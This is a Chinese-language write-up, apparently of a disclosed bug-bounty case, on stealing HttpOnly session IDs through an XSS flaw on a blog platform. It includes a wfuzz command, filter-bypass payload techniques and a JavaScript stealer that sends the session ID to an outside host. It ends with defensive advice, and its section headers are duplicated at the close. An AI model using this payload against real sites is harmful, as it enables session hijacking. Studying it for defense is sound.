通过XSS窃取HttpOnly Cookie的技术分析与防御指南<\/h1>

1. 漏洞发现过程概述<\/h2>
本文详细分析了一个通过XSS漏洞窃取HttpOnly Cookie的实际案例，展示了攻击者如何绕过安全限制获取敏感会话信息。<\/p>

关键发现点：<\/h3>

目标网站：jerico.com（一个拥有5亿用户的博客平台）<\/li>
漏洞入口点：\/account\/settings\/server<\/code>端点存在XSS漏洞<\/li>

特殊发现：登录API在响应体中返回会话ID，尽管Cookie标记为HttpOnly<\/li>
<\/ul>
2. XSS漏洞的发现与利用<\/h2>
2.1 初始发现<\/h3>
攻击者使用wfuzz工具进行目录枚举：<\/p>
wfuzz -c -z file,\/root\/Desktop\/common-list --hc 404,400,302 https:\/\/jerico.com\/FUZZ
<\/span><\/span><\/code><\/pre>发现\/account\/settings\/server<\/code>端点返回200状态码，并在页面源代码中发现：<\/p>
<script<\/span>> var<\/span> user<\/span> =<\/span>'server'<\/span>; <\/SCRIPT<\/span>>
<\/span><\/span><\/code><\/pre>2.2 XSS Payload构造<\/h3>
简单验证Payload：<\/p>
https:\/\/jerico.com\/account\/settings\/server'-alert(2)-'
<\/code><\/pre>
成功触发XSS弹窗，确认漏洞存在。<\/p>
3. 绕过HttpOnly限制的技术<\/h2>
3.1 会话ID泄露点分析<\/h3>
虽然会话Cookie被标记为HttpOnly：<\/p>
Set-Cookie:session=xz4z5cxz4c56zx4c6x5zc46z5xczx46cx4zc6xz4czxc; secure;httpOnly;domain=jersico.com
<\/code><\/pre>
但登录API在响应体中返回了相同的会话ID：<\/p>
{"session"<\/span>:"xz4z5cxz4c56zx4c6x5zc46z5xczx46cx4zc6xz4czxc"<\/span>}
<\/span><\/span><\/code><\/pre>3.2 利用技术<\/h3>
攻击者发现无需提供凭据，仅需发送包含有效会话Cookie的POST请求即可获取会话ID：<\/p>
POST<\/span> \/Account\/Login HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Cookie:<\/span> session=xz4z5cxz4c56zx4c6x5zc46z5xczx46cx4zc6xz4czxc;<\/span>
<\/span><\/span>HOST:<\/span> jerico.com<\/span>
<\/span><\/span><\/code><\/pre>4. 高级XSS Payload构造技术<\/h2>
4.1 字符过滤绕过<\/h3>
由于特殊字符被过滤（",<>\/\），攻击者采用以下技术：<\/p>

使用String.fromCharCode()<\/code>转换ASCII码<\/li>
使用.concat()<\/code>方法代替逗号分隔<\/li>
<\/ol>
示例：<\/p>
\/\/ 原始：alert(1337)
<\/span><\/span><\/span><\/span>eval(String.fromCharCode<\/span>(97<\/span>,108<\/span>,101<\/span>,114<\/span>,116<\/span>,40<\/span>,49<\/span>,51<\/span>,51<\/span>,55<\/span>,41<\/span>))
<\/span><\/span>
<\/span><\/span>\/\/ 使用concat替代逗号：
<\/span><\/span><\/span><\/span>'a'<\/span>.concat<\/span>('b'<\/span>)
<\/span><\/span><\/code><\/pre>4.2 自动化Payload生成<\/h3>
攻击者开发Python脚本将任意JavaScript代码转换为过滤绕过形式：<\/p>
# Js2S.py脚本功能：将JavaScript代码转换为过滤绕过形式<\/span>
<\/span><\/span># 使用示例：<\/span>
<\/span><\/span>python Js2S.<\/span>py payload.<\/span>txt
<\/span><\/span><\/code><\/pre>5. 完整攻击链<\/h2>
5.1 最终Payload结构<\/h3>
https:\/\/jerico.com\/Account\/Settings\/server`-dcument.write( <<生成的payload>> )'-
<\/code><\/pre>
5.2 攻击流程<\/h3>

受害者访问恶意构造的URL<\/li>
页面执行document.write，写入恶意脚本<\/li>
恶意脚本发送XHR POST请求到登录端点<\/li>
从响应体中提取会话ID<\/li>
将会话ID发送到攻击者控制的服务器<\/li>
<\/ol>
5.3 窃取会话的JavaScript代码<\/h3>
<<\/span>script<\/span>><\/span>
<\/span><\/span>var<\/span> xhr<\/span> =<\/span> new<\/span> XMLHttpRequest<\/span>();
<\/span><\/span>xhr<\/span>.onreadystatechange<\/span> =<\/span> function<\/span>() {
<\/span><\/span>    if<\/span> (xhr<\/span>.readyState<\/span> ==<\/span> 4<\/span>) {
<\/span><\/span>        prompt<\/span>('You are hacked , your session='<\/span>+<\/span>xhr<\/span>.response<\/span>);
<\/span><\/span>        document.location<\/span>.replace<\/span>('\/\/yassergersy.com\/stealer?data='<\/span>+<\/span>xhr<\/span>.response<\/span>);
<\/span><\/span>    }
<\/span><\/span>}
<\/span><\/span>xhr<\/span>.open<\/span>('POST'<\/span>, '\/account\/login'<\/span>, true<\/span>);
<\/span><\/span>xhr<\/span>.withCredentials<\/span> =<\/span> true<\/span>;
<\/span><\/span>xhr<\/span>.send<\/span>(null<\/span>);
<\/span><\/span><<\/span>\/script><\/span>
<\/span><\/span><\/code><\/pre>6. 防御措施<\/h2>
6.1 防止XSS<\/h3>

对所有用户输入进行严格的输出编码<\/li>
实施内容安全策略(CSP)<\/li>
使用X-XSS-Protection头<\/li>
避免在JavaScript中直接使用用户输入<\/li>
<\/ol>
6.2 保护会话ID<\/h3>

不要在响应体中返回会话ID<\/li>
确保HttpOnly和Secure标志始终设置<\/li>
实现会话固定保护<\/li>
考虑使用SameSite Cookie属性<\/li>
<\/ol>
6.3 输入过滤<\/h3>

实施严格的输入验证<\/li>
使用白名单而非黑名单方法<\/li>
对特殊字符进行适当转义<\/li>
<\/ol>
7. 漏洞时间线<\/h2>

2018年2月4日：漏洞报告<\/li>
2018年2月5日：分类确认<\/li>
<\/ul>
8. 经验教训<\/h2>

漏洞链式利用可提高攻击影响<\/li>
不应仅依赖HttpOnly保护会话<\/li>
API响应可能泄露敏感信息<\/li>
简单的XSS可能导致严重的会话劫持<\/li>
<\/ol>
通过此案例，我们了解到即使设置了HttpOnly标志，如果应用程序设计不当，攻击者仍可能通过其他途径获取会话凭证。全面的安全措施和深度防御策略至关重要。<\/p>

通过XSS窃取HttpOnly Cookie的技术分析与防御指南<\/h1>

1. 漏洞发现过程概述<\/h2> 本文详细分析了一个通过XSS漏洞窃取HttpOnly Cookie的实际案例，展示了攻击者如何绕过安全限制获取敏感会话信息。<\/p>

2. XSS漏洞的发现与利用<\/h2>

3. 绕过HttpOnly限制的技术<\/h2>

4. 高级XSS Payload构造技术<\/h2>

5. 完整攻击链<\/h2>

6. 防御措施<\/h2>

1. 漏洞发现过程概述<\/h2>
本文详细分析了一个通过XSS漏洞窃取HttpOnly Cookie的实际案例，展示了攻击者如何绕过安全限制获取敏感会话信息。<\/p>